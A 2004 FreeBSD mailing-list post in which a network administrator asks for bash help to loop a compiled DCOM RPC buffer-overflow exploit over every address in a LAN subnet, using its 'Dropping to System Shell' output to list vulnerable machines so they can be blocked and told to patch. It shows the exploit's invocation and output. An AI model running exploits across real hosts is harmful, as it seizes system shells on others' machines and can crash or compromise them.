Date: Tue, 16 Mar 2004 01:40:51 +0200
From: hugle
To: freebsd-questions@freebsd.org
Subject: Need bash help
Message-ID: <130471393648.20040316014051@vkt.lt>

Hello all.

I'm writing here because I think people here can help me.
(P.S. I didn't find any bash mailing lists.)

So here's what I'm planning to do.
I have a big LAN here, and noticed that lots of users are still exploitable using RPC.
I've just found the source of this exploit, compiled it, and tried to use it - it works.
What I'm planning to do is automatically detect such users (exploitable).

So I run:

ftp# ./dc IP

and get:

---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM
- Using return address of 0x77e626ba
- Dropping to System Shell...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

END.

So if there is text like '- Dropping to System Shell...', it means that the system is vulnerable.
Otherwise it returns:

---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM
- Using return address of 0x77e626ba
- Exploit appeared to have failed.

So what I wanna do is smth like:

for i in `seq 1 254`; do
  ./dc 192.168.1.$i
  and if it returns 'Dropping to system shell' then
  add these IP to vulderable_users
done

Afterwards I'm planning to block those users on my router, and forward them to a webpage with an explanation of how to FIX that bug.

Thanks for the help in advance,
Jarek